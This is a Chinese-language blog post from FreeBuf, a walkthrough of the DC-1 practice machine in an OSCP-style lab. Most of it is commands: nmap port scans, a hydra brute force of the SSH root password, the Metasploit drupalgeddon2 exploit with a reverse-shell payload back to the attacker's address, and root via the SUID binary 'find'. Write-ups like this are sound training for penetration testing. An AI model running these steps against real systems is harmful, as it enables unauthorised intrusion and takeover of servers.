官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
OSCP系列靶场-Esay-DC-1
- 关注
OSCP系列靶场-Esay-DC-1
本文由
创作,已纳入「FreeBuf原创奖励计划」,未授权禁止转载
总结
getwebshell → 发现CMS→ MSF远程反弹SHELL
提 权 思 路 → 发现SUID-FIND→ FIND提权
准备工作
启动VPN
获取攻击机IP >192.168.45.167
启动靶机
获取目标机器IP >192.168.223.193
信息收集-端口扫描
目标开放端口收集
Nmap开放端口扫描2次
sudo nmap --min-rate 10000 -p- 192.168.223.193
sudo nmap -sU --min-rate 10000 -p- 192.168.223.193
通过两次收集到的端口:→22,80,111,46232,53990
目标端口对应服务探测
通常udp端口测不出啥,主要探测tcp
# tcp探测
sudo nmap -sT -sV -O -sC -p22,80,111,46232,53990 192.168.223.193
信息收集-端口测试
22-SSH端口的信息收集
22-SSH端口版本信息与MSF利用(pass)
通过Nmap探测获得SSH的版本信息,可以尝试利用22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
# 进入msf OpenSSH 6.0p1
msfconsole
# 搜索对应脚本
msf6 > searchsploit openssh 6.0p1
22-SSH手动登录尝试(失败)
尝试root账户的密码爆破发现报错之后进行手动尝试
ssh root<span class="label label-primary">@192.168.223.193</span> -p 22
# 密码尝试
password > root
说明支持密码登录,但是密码不对
22-SSH弱口令爆破(爆破着玩)
尝试root账户的密码爆破,利用工具hydra,线程-t为6
hydra -l root -P /usr/share/wordlists/metasploit/password.lst -t 6 -vV 192.168.223.193 ssh -s 22
在等待结果的同时让我们尝试使用另外的信息收集
80-HTTP端口的信息收集
访问 http://192.168.223.193:80 发现是一个有名的CMS
信息收集-网站指纹
whatweb -v http://192.168.223.193:80
确认了CMS的版本信息 Drupal 7
漏洞利用-网站指纹
既然确定了版本,直接上工具
msfconsole
searchsploit Drupal 7
查看了一下
其他端口的信息收集
不需要啦~
漏洞利用-getwebshell
觉得还是远程执行的exp比较好
search Drupal 7
>use exploit/unix/webapp/drupal_drupalgeddon2
选一个时间靠后并且Rank比较高的
# 感觉只要设置攻击机以及监听端口,还有目标机器
show options
# 设置个反弹shell
show payloads
set payload 3
# 配置MSF
set lhost 192.168.45.208
set lport 5555
set rhosts 192.168.230.193
set rport 80
run
成功getwebshell
内网遨游-getshell
交互shell
由于获取的shell交互不友好,使用shell先获取shell
# 利用shell命令获取shell
meterpreter > shell
Process 4192 created.
Channel 0 created.
pwd
/var/www
whoami
www-data
# 利用python获取交互shell -> python失败使用python3
python -c "import pty;pty.spawn('/bin/bash')";
www-data<span class="label label-primary">@DC-1</span>:/var/www$
FLAG1获取
www-data<span class="label label-primary">@DC-1</span>:/var/www$ find / -name local.txt 2>/dev/null
find / -name local.txt 2>/dev/null
/home/local.txt
www-data<span class="label label-primary">@DC-1</span>:/var/www$ cat /home/local.txt
cat /home/local.txt
******************
权限提升
Linux提权-sudo提权尝试(失败)
查找具有sudo权限,且不需要密码的可提权文件
# 利用sudo -l寻找
sudo -l
Linux提权-suid提权尝试
# -perm 文件权限
find / -perm -u=s -type f 2>/dev/null
如果发现有东西的话 访问 https://gtfobins.github.io 寻找
# 查找文件提权
find . -exec '/bin/sh' \;
提权成功
FLAG2获取
# cat /root/proof.txt
cat /root/proof.txt
****************
完结撒花~
已在FreeBuf发表 0 篇文章
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
- 0 文章数
- 0 关注者
文章目录